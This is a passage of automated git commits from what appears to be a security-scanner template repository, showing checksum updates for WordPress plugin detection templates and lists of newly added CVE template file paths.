+http/technologies/wordpress/plugins/sg-security.yaml:e833734b1006bc06ee6c86a825b3902ec67fb113 +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:55d132c332394a78efb0b3130261bf37cc0612d2 +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:196c39da6c914816c14f11df5fc9106d9439f200 +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:f7959e70ca5912ffccbe8bfb5aaf69f15dea94ad +http/technologies/wordpress/plugins/simple-history.yaml:2159d42f27309f1f6a116a76e883b46ef1087ce9 http/technologies/wordpress/plugins/simple-page-ordering.yaml:7d96ac56d7ed2ed031b6789429888ef703d39538 -http/technologies/wordpress/plugins/siteguard.yaml:ebe1032886ba216c9b7b6d7bbccae91353d31179 -http/technologies/wordpress/plugins/siteorigin-panels.yaml:cfe2660830bf44d2ed9ceeb822df6b80a42ef3b9 -http/technologies/wordpress/plugins/smart-slider-3.yaml:a4026002291082ef708d89d4a0f06c989f1e0572 -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:3fe3c84cab5872a8e6cd05d4f980e39f2c1a8cec +http/technologies/wordpress/plugins/siteguard.yaml:1603622bb764bbd891fa245b1fb0851d8443eec0 +http/technologies/wordpress/plugins/siteorigin-panels.yaml:bdd37fdd569c13441fb87d5a310a8beca53ecead +http/technologies/wordpress/plugins/smart-slider-3.yaml:6669412fae6e1f830d8132df4b3ad7036fa95746 +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:9e123d8b5122703a197a8279f6b6612af707aa1f http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:aab70fa0f4b1c898371aa4af959db60e6cc733dd -http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:b3c16852e6ce99b39127fbbb91d0c351639199f3 -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:1b8a39f280dae43a7b67d73d77d2d2684f2bdcbe -http/technologies/wordpress/plugins/sucuri-scanner.yaml:64ecdf400f2478c5f89478e0a5e800b2679ad8ea -http/technologies/wordpress/plugins/svg-support.yaml:7935857bc3668567fd301224e379012675d57f5d -http/technologies/wordpress/plugins/table-of-contents-plus.yaml:dd7665b5d5809f9a7af20fe8d127f9e65958aff1 -http/technologies/wordpress/plugins/tablepress.yaml:819ba7ff62b37f9554f88a351e73780d64d79d4d -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:adfc102f25196d28ae4c6d62556cc984a8829832 -http/technologies/wordpress/plugins/templately.yaml:60e88028d8fb59c871fb30441f264571ebc92423 -http/technologies/wordpress/plugins/the-events-calendar.yaml:354edf053272f0544de1ca2fe122a23a995b80a1 +http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:218b764f5e7ec74be15c072c6dcef4976de6d79b +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:48e485435630e99bcc197171a946575b47361c73 +http/technologies/wordpress/plugins/sucuri-scanner.yaml:73a5d57f8a22ede9c4de7d3fba4f1aeaa4c4bb2e +http/technologies/wordpress/plugins/svg-support.yaml:9e209af3c91abf6ba27d6d2b49ddf7196dc91450 +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:e9ca166f376b599e787a66db6114262e2a888811 +http/technologies/wordpress/plugins/tablepress.yaml:1907c25a373a78ea4c81d21eae209acb12104a9b +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:a8ac16c00a1fe225e48ebe24c94aba1323e1e584 +http/technologies/wordpress/plugins/templately.yaml:2b4d2d3c2706a8736bd848f882e18bb587689859 +http/technologies/wordpress/plugins/the-events-calendar.yaml:52c6ff41c4bd34154268728639cfa0e3b4f8d8ab http/technologies/wordpress/plugins/themeisle-companion.yaml:c706aef04e5b9ce414f460819eca30bb3bcb00e5 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:6eecc1bcfe64f290b321c2ed9fe8c002cf1e9710 -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:661cafb3ae8ea14d420b77e82599e2464dd38ccd -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:da21327ec6e6e3081bcc8c2a407ea35101b7de56 -http/technologies/wordpress/plugins/under-construction-page.yaml:0834f762d5b3698719d4dbddfe9bf037cf4a3e52 +http/technologies/wordpress/plugins/tinymce-advanced.yaml:9e6bb4ae3c2a1718e019e5374810c6b9e64fa3f5 +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:97b7e9a9b4b15aff49cca7d5e725392e7bf627fd +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:9c37c0d9262b2938015364f494651b05b0fa6033 +http/technologies/wordpress/plugins/under-construction-page.yaml:c76e58a7cf7365aaaa3685531874f5d2ea3d1b68 http/technologies/wordpress/plugins/unyson.yaml:e01d9f525f3cf577ab43441c694230c07608611e -http/technologies/wordpress/plugins/updraftplus.yaml:6bc0b7fd06cc3499e7aaacd57f94dcdd1576ff92 +http/technologies/wordpress/plugins/updraftplus.yaml:5050d66d21b2380882e67332a769bc7da06154e6 http/technologies/wordpress/plugins/use-any-font.yaml:e1c358a86017c4c3f5abe62d76da6878d61f5d47 -http/technologies/wordpress/plugins/user-role-editor.yaml:140ac6a229ee4985f277c0733ff62e9a36e4781a +http/technologies/wordpress/plugins/user-role-editor.yaml:65b055fb6332b2169a9e7143591f116c146e06a8 http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:1a6d9e7560dba5c9471c20cffdf0ba1b098fbb7c -http/technologies/wordpress/plugins/w3-total-cache.yaml:932c493aa7c4fe437b63b9b9c88caff530bb7ed7 -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:7ea3e3db1bf5da5d2b32a3f5877442357beab3b8 -http/technologies/wordpress/plugins/webp-express.yaml:eb6746917e2352e99af656d86b41da1d24b7b7aa -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:1730b137f5ce0db2c4f4805960b25236dfb9a1c9 -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:570a0c9e5c0f6ebc34502bebcb10c3214e71a850 -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:9b975daf4e18c87d19be89afa6730f6fa9ba132f -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:9760c10568b4d4fc5c73c1707380fe6da23f0770 +http/technologies/wordpress/plugins/w3-total-cache.yaml:e6d76a664a5009598ce3e2d6f3b412667c9cacef +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:305690e415de547348ac36cf0d9544b347b16a38 +http/technologies/wordpress/plugins/webp-express.yaml:fcb956491146843be9f3b5f152965cc0796f75e8 +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:ffa48fc0f80ceb41dff2b5c69116837b0111e074 +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6db1302965c217cd38e160295fd9d7defa47afa9 +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:c2b6a592df83eb0b6abbfa988893633cb948b997 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:68f2dd5d2776de335efc273ddf2249b507527398 http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:4f2c82ad5cf98659804bd115d05bf9db8461e200 -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:42448e924ae7ca2d45d14c0fc5a77b0691cae601 -http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:d64d6998649463dfa6334ebcc6c80522a52834bc -http/technologies/wordpress/plugins/woocommerce-payments.yaml:cc17c9c93321c5932b12658176c37ccfbcfa35b6 -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:6848d082e7b2cb424d5cc9cb4ee62dbc2bc48bd8 -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:4f5ffbdc5373b850b2958a7db2f4905f32cda4d8 -http/technologies/wordpress/plugins/woocommerce-services.yaml:463fc3b7b5dbf6be5fb511c471ee175c5e8b91b1 -http/technologies/wordpress/plugins/woocommerce.yaml:4cf20dddbfcccac6d694df339e26f4563a91c830 -http/technologies/wordpress/plugins/wordfence.yaml:b28cbff4aeadada503735ca2c2f86d5121cfb767 -http/technologies/wordpress/plugins/wordpress-importer.yaml:cd3d5aceb37f3191a99a35d2ae5f7675dd89a558 -http/technologies/wordpress/plugins/wordpress-seo.yaml:4ba4b1329172410b1e796bee5c1dd461a93c3589 +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:9929d037d9f1459cff16926d024bcf666c50edda +http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:e7b3acf574cd1dc2b9d4f7a6240769a83a938856 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:60a3ada3d5bd510f77eb3a77c32d88ad20e997bc +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:b2a01f711495d5a37d201b510a6487ae816dab9b +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d3b1a70c5b241c5776101bdf5fb0ee9753725d4b +http/technologies/wordpress/plugins/woocommerce-services.yaml:6f9a1c3b761936c259c9e29ee32d28f691ae8b77 +http/technologies/wordpress/plugins/woocommerce.yaml:8231905d6d899f1da3fe5641cb3908eac4c1113f +http/technologies/wordpress/plugins/wordfence.yaml:43d1eb1e1e314aa16d9c1d5d0d5d4c59de91ac1b +http/technologies/wordpress/plugins/wordpress-importer.yaml:c7ba561f2a03d75e5f929c367ecdce158d4e456f +http/technologies/wordpress/plugins/wordpress-seo.yaml:a9de56a1598eaa8ab15ab968f734d71fdf2bc107 http/technologies/wordpress/plugins/wordpress-woosidebars.yaml:679cd62c97446d90fc7fbb50f64403cb10c4c319 -http/technologies/wordpress/plugins/worker.yaml:fee2932bc7dc36c05453b0ebe79afdcc0fb182f5 -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:de42682d38cd6e69a5926e379166f8b4549cbaa0 -http/technologies/wordpress/plugins/wp-file-manager.yaml:244d1c59efee06bea06948e11da837e29b0f437c -http/technologies/wordpress/plugins/wp-google-maps.yaml:c1aeb9300ed8869add73f461454b3ba0f8aa36fb -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:d94fa609b57d7866e751f47619d309a1fab6bc7a -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:07f3f3f93c2f0dd3ef8b4ebc65aac12e2bf3c559 -http/technologies/wordpress/plugins/wp-migrate-db.yaml:b955b8b715fc18cc83033f2d7b01e61b9ff63e5c -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:f498a0eb605778f62ad630419a4c46f3622c98fe -http/technologies/wordpress/plugins/wp-optimize.yaml:5488e9484f0e17998bbbea85cb19b3245100917c -http/technologies/wordpress/plugins/wp-pagenavi.yaml:eee8f335071631505caef531a34c68198db2e121 -http/technologies/wordpress/plugins/wp-reset.yaml:cce0fd7135119d9115a12d3bdb11a9c613910ff4 -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:f314766084e712e539da2986df7c3cb81d4304df -http/technologies/wordpress/plugins/wp-rollback.yaml:49e0338e38862c60caacefa5741ac1f0da239bcf -http/technologies/wordpress/plugins/wp-seopress.yaml:5c042c48ffe12c90b4c0d6ef208e64f4fd55de70 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:b40d7b5a93ccd347a4836ed5a5f8c60228f9dba6 -http/technologies/wordpress/plugins/wp-smushit.yaml:1c3518c5a74f9305c6a7e943bb6f82ddd9a3eb73 -http/technologies/wordpress/plugins/wp-statistics.yaml:f7ef8791b19cc7806b94ea8fe27bb45b2b363a79 -http/technologies/wordpress/plugins/wp-super-cache.yaml:6aa07fd993ad37c92a13f29b66a7fb6af51ade4f +http/technologies/wordpress/plugins/worker.yaml:eec5a16391040875785d932499c9f260e8efeb8c +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:3bac8419d21ce83693d583293fb12b438a544402 +http/technologies/wordpress/plugins/wp-file-manager.yaml:227e50238a78872a0caf5ac0c54ab4d4fa33be67 +http/technologies/wordpress/plugins/wp-google-maps.yaml:f398fe5460d8180c0e85568b79baa92355130348 +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:3c08f95f3bce5c44e7c5ebda373c397d0ddb8342 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:d7bb63c19f2338fd77cfa210fc4fa2e2c8bbff85 +http/technologies/wordpress/plugins/wp-migrate-db.yaml:996eb41fddbc34f6078ebecc34cececbb6eec504 +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:252c64b3711943bbfd6d507669f1175f2225cbb2 +http/technologies/wordpress/plugins/wp-optimize.yaml:7d8bae34481b9723031a3574ce49620e76ad88ec +http/technologies/wordpress/plugins/wp-pagenavi.yaml:2a1f36db756a5f86740144301429285d3c50fee9 +http/technologies/wordpress/plugins/wp-reset.yaml:28019b1d96d3d4c456ac774c3e5cdeb666b06859 +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:6100c61e48b0e15a0971d15714bdefa28c1fedcc +http/technologies/wordpress/plugins/wp-rollback.yaml:f7b2f501eb11a44d43b23d3933c06fe15927b2ca +http/technologies/wordpress/plugins/wp-seopress.yaml:1f1aa346cc5d9b8f6c766a4d6388dc8f90e34030 +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:a4e9a4bb7976f9cab3829e15f7cf6a476a2e3792 +http/technologies/wordpress/plugins/wp-smushit.yaml:cff5012e05d9eca8dae054e4d73667340c631ddb +http/technologies/wordpress/plugins/wp-statistics.yaml:db2b26951dec4a78053fac69af816940d49cda0b +http/technologies/wordpress/plugins/wp-super-cache.yaml:312d5ce63e6b319b2688eb416664e575699fe649 http/technologies/wordpress/plugins/wp-user-avatar.yaml:a8aa0e902ead01de33b23343603d18b63829517e -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:30c423eca35cbbdac12de389ad8f3d3744dd2718 -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:3cd9ca1ac29d0bb78edc4f5a5ee668d23fe891e5 -http/technologies/wordpress/plugins/wpforms-lite.yaml:7b52dc91093c05ac604a1e1c6f4b035867b05a2b -http/technologies/wordpress/plugins/wps-hide-login.yaml:49fcf56abc3c21e60f2bbaf47dcec51daf6f1454 -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:33b3b16f9e8da8d4c8f96f13ba0b84eda5ed0a52 +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:a9acaa8bc79b55109355d8894c249b6e99fba870 +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:da8bff7c82756e3e1ac6810a8eb2ef194d109a43 +http/technologies/wordpress/plugins/wpforms-lite.yaml:1fcff3d3b881c0f9dcf700cf7751c5297ee289ce +http/technologies/wordpress/plugins/wps-hide-login.yaml:faf97e5fb87bd43caaa123bb77e5cb64d218f00d +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:f03291859093b6ab5196a683c017e300566beb9d http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:caf39ccc6507df09c0816caa7af29404c193d9a5 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:f6b5093d6972b7e0fa2431c60448e79b032a0859 +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:c3474b242e88f3dd31b5317051e69194f36317f9 http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml:0b85e26615c692bab9ceb5ae74dc9adec4097b9e http/technologies/wordpress-detect.yaml:a0148caf9d3f957171e7b75d4382dc7d54e454e5 http/technologies/workerman-websocket-detect.yaml:1396bc8234c4f538d5f57966b6b8084fe68f574f @@ -8618,7 +8619,7 @@ javascript/detection/oracle-tns-listener.yaml:f55369203a5da17a5573fe29d9dc9ebd31 javascript/detection/samba-detect.yaml:542324589cb7b9d34305c339d12350105050f250 javascript/detection/ssh-auth-methods.yaml:7240dac7d7ee80f4aebf95f7ddf7a540874adf04 javascript/enumeration/checkpoint-firewall-enum.yaml:138f2fd977904d9c0b0ba4417077563babf22fbc -javascript/enumeration/ldap/ldap-metadata.yaml:43ceb0444c8984396929c504744c572f8b427a40 +javascript/enumeration/ldap/ldap-metadata.yaml:c9a88f5ea1a7235863a9c1dc7a0b6d7280220854 javascript/enumeration/minecraft-enum.yaml:86520064cf23ae09b9ce6a2ec23f29abaeb9eb5e javascript/enumeration/mysql/mysql-default-login.yaml:6b496745946bfc4fbb85cba1c438a9825d3b9450 javascript/enumeration/mysql/mysql-info.yaml:5ceb2e000a061946387f2c789f0f8c8088b2ca3e @@ -8841,7 +8842,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:908c379aaa9061832c58f85b151fc36545b6a8de +templates-checksum.txt:d2727ad00f9a73651cb8e53769376e8d9353bee0 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 3b9d04c3af0a1aa8066d3ef959b837dfcc6eb449 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 8 Jul 2024 07:10:17 +0000 Subject: [PATCH 0956/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index a1824de2c1..88e0cbce73 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -17,6 +17,7 @@ on: - 'http/cves/2024/CVE-2024-32709.yaml' - 'http/cves/2024/CVE-2024-33113.yaml' - 'http/cves/2024/CVE-2024-33605.yaml' + - 'http/cves/2024/CVE-2024-33610.yaml' - 'http/cves/2024/CVE-2024-34102.yaml' - 'http/cves/2024/CVE-2024-36401.yaml' - 'http/cves/2024/CVE-2024-37152.yaml' From 4622ea5b4672c39f50b19bf3209759b386fa4bca Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 8 Jul 2024 07:10:56 +0000 Subject: [PATCH 0957/1841] Auto Generated New Template Addition List [Mon Jul 8 07:10:56 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 3fc08049a9..cbd689ac4a 100644 --- a/.new-additions +++ b/.new-additions @@ -15,6 +15,7 @@ http/cves/2024/CVE-2024-33605.yaml http/cves/2024/CVE-2024-33610.yaml http/cves/2024/CVE-2024-34102.yaml http/cves/2024/CVE-2024-36401.yaml +http/cves/2024/CVE-2024-36991.yaml http/cves/2024/CVE-2024-37152.yaml http/cves/2024/CVE-2024-37881.yaml http/cves/2024/CVE-2024-4434.yaml From ca97d1070be3b97264b30706f549697197cf300b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 8 Jul 2024 07:11:05 +0000 Subject: [PATCH 0958/1841] Auto Template Signing [Mon Jul 8 07:11:05 UTC 2024] :robot: --- http/cves/2024/CVE-2024-33610.yaml | 1 + http/technologies/wordpress/plugins/ad-inserter.yaml | 1 + http/technologies/wordpress/plugins/add-to-any.yaml | 1 + http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 + http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 + http/technologies/wordpress/plugins/akismet.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 + .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 + http/technologies/wordpress/plugins/amp.yaml | 1 + http/technologies/wordpress/plugins/antispam-bee.yaml | 1 + http/technologies/wordpress/plugins/astra-sites.yaml | 1 + http/technologies/wordpress/plugins/autoptimize.yaml | 1 + http/technologies/wordpress/plugins/backwpup.yaml | 1 + http/technologies/wordpress/plugins/better-search-replace.yaml | 1 + http/technologies/wordpress/plugins/better-wp-security.yaml | 1 + .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 + http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 + http/technologies/wordpress/plugins/breeze.yaml | 1 + http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 + http/technologies/wordpress/plugins/chaty.yaml | 1 + .../technologies/wordpress/plugins/child-theme-configurator.yaml | 1 + http/technologies/wordpress/plugins/classic-editor.yaml | 1 + http/technologies/wordpress/plugins/classic-widgets.yaml | 1 + .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 + http/technologies/wordpress/plugins/cmb2.yaml | 1 + http/technologies/wordpress/plugins/coblocks.yaml | 1 + http/technologies/wordpress/plugins/code-snippets.yaml | 1 + http/technologies/wordpress/plugins/coming-soon.yaml | 1 + http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7.yaml | 1 + http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 + http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 + http/technologies/wordpress/plugins/cookie-notice.yaml | 1 + http/technologies/wordpress/plugins/copy-delete-posts.yaml | 1 + http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 + .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 + http/technologies/wordpress/plugins/custom-css-js.yaml | 1 + http/technologies/wordpress/plugins/custom-fonts.yaml | 1 + http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 + http/technologies/wordpress/plugins/disable-comments.yaml | 1 + http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/duplicate-page.yaml | 1 + http/technologies/wordpress/plugins/duplicate-post.yaml | 1 + http/technologies/wordpress/plugins/duplicator.yaml | 1 + .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 + http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 + http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 + http/technologies/wordpress/plugins/elementor.yaml | 1 + http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 + http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 + http/technologies/wordpress/plugins/envato-elements.yaml | 1 + .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 + http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 + .../technologies/wordpress/plugins/facebook-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 + .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 + http/technologies/wordpress/plugins/flamingo.yaml | 1 + http/technologies/wordpress/plugins/fluentform.yaml | 1 + http/technologies/wordpress/plugins/font-awesome.yaml | 1 + .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/formidable.yaml | 1 + http/technologies/wordpress/plugins/forminator.yaml | 1 + http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 + http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 + .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 + .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 + http/technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 + http/technologies/wordpress/plugins/google-site-kit.yaml | 1 + .../technologies/wordpress/plugins/google-sitemap-generator.yaml | 1 + http/technologies/wordpress/plugins/gtranslate.yaml | 1 + http/technologies/wordpress/plugins/gutenberg.yaml | 1 + http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 + .../wordpress/plugins/header-footer-code-manager.yaml | 1 + http/technologies/wordpress/plugins/header-footer-elementor.yaml | 1 + http/technologies/wordpress/plugins/header-footer.yaml | 1 + http/technologies/wordpress/plugins/health-check.yaml | 1 + http/technologies/wordpress/plugins/hello-dolly.yaml | 1 + http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 + http/technologies/wordpress/plugins/hostinger.yaml | 1 + http/technologies/wordpress/plugins/image-optimization.yaml | 1 + http/technologies/wordpress/plugins/imagify.yaml | 1 + http/technologies/wordpress/plugins/imsanity.yaml | 1 + .../wordpress/plugins/insert-headers-and-footers.yaml | 1 + http/technologies/wordpress/plugins/instagram-feed.yaml | 1 + .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 + http/technologies/wordpress/plugins/jetpack.yaml | 1 + http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 + http/technologies/wordpress/plugins/kirki.yaml | 1 + http/technologies/wordpress/plugins/leadin.yaml | 1 + .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 + http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 + http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 + http/technologies/wordpress/plugins/loco-translate.yaml | 1 + http/technologies/wordpress/plugins/loginizer.yaml | 1 + .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 + http/technologies/wordpress/plugins/mailpoet.yaml | 1 + http/technologies/wordpress/plugins/maintenance.yaml | 1 + http/technologies/wordpress/plugins/mainwp-child.yaml | 1 + http/technologies/wordpress/plugins/malcare-security.yaml | 1 + http/technologies/wordpress/plugins/megamenu.yaml | 1 + http/technologies/wordpress/plugins/members.yaml | 1 + http/technologies/wordpress/plugins/meta-box.yaml | 1 + http/technologies/wordpress/plugins/metform.yaml | 1 + http/technologies/wordpress/plugins/ml-slider.yaml | 1 + http/technologies/wordpress/plugins/newsletter.yaml | 1 + .../technologies/wordpress/plugins/nextend-facebook-connect.yaml | 1 + http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 + http/technologies/wordpress/plugins/ninja-forms.yaml | 1 + http/technologies/wordpress/plugins/ocean-extra.yaml | 1 + http/technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 + http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 + http/technologies/wordpress/plugins/optinmonster.yaml | 1 + http/technologies/wordpress/plugins/otter-blocks.yaml | 1 + http/technologies/wordpress/plugins/password-protected.yaml | 1 + http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 + .../wordpress/plugins/pinterest-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 + http/technologies/wordpress/plugins/polylang.yaml | 1 + http/technologies/wordpress/plugins/popup-maker.yaml | 1 + http/technologies/wordpress/plugins/post-smtp.yaml | 1 + http/technologies/wordpress/plugins/post-types-order.yaml | 1 + .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 + http/technologies/wordpress/plugins/pretty-link.yaml | 1 + http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 + http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 + http/technologies/wordpress/plugins/redirection.yaml | 1 + http/technologies/wordpress/plugins/redux-framework.yaml | 1 + http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/royal-elementor-addons.yaml | 1 + http/technologies/wordpress/plugins/safe-svg.yaml | 1 + http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 + http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 + http/technologies/wordpress/plugins/sg-security.yaml | 1 + http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 + .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 + .../technologies/wordpress/plugins/simple-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/simple-history.yaml | 1 + http/technologies/wordpress/plugins/siteguard.yaml | 1 + http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 + http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 + http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 + .../wordpress/plugins/sticky-header-effects-for-elementor.yaml | 1 + .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 + http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 + http/technologies/wordpress/plugins/svg-support.yaml | 1 + http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 + http/technologies/wordpress/plugins/tablepress.yaml | 1 + http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 + http/technologies/wordpress/plugins/templately.yaml | 1 + http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 + http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 + .../wordpress/plugins/translatepress-multilingual.yaml | 1 + .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/under-construction-page.yaml | 1 + http/technologies/wordpress/plugins/updraftplus.yaml | 1 + http/technologies/wordpress/plugins/user-role-editor.yaml | 1 + http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 + .../technologies/wordpress/plugins/webp-converter-for-media.yaml | 1 + http/technologies/wordpress/plugins/webp-express.yaml | 1 + .../technologies/wordpress/plugins/widget-importer-exporter.yaml | 1 + .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 + .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 + http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 + .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 + .../wordpress/plugins/woocommerce-legacy-rest-api.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 + .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 + .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 + http/technologies/wordpress/plugins/woocommerce.yaml | 1 + http/technologies/wordpress/plugins/wordfence.yaml | 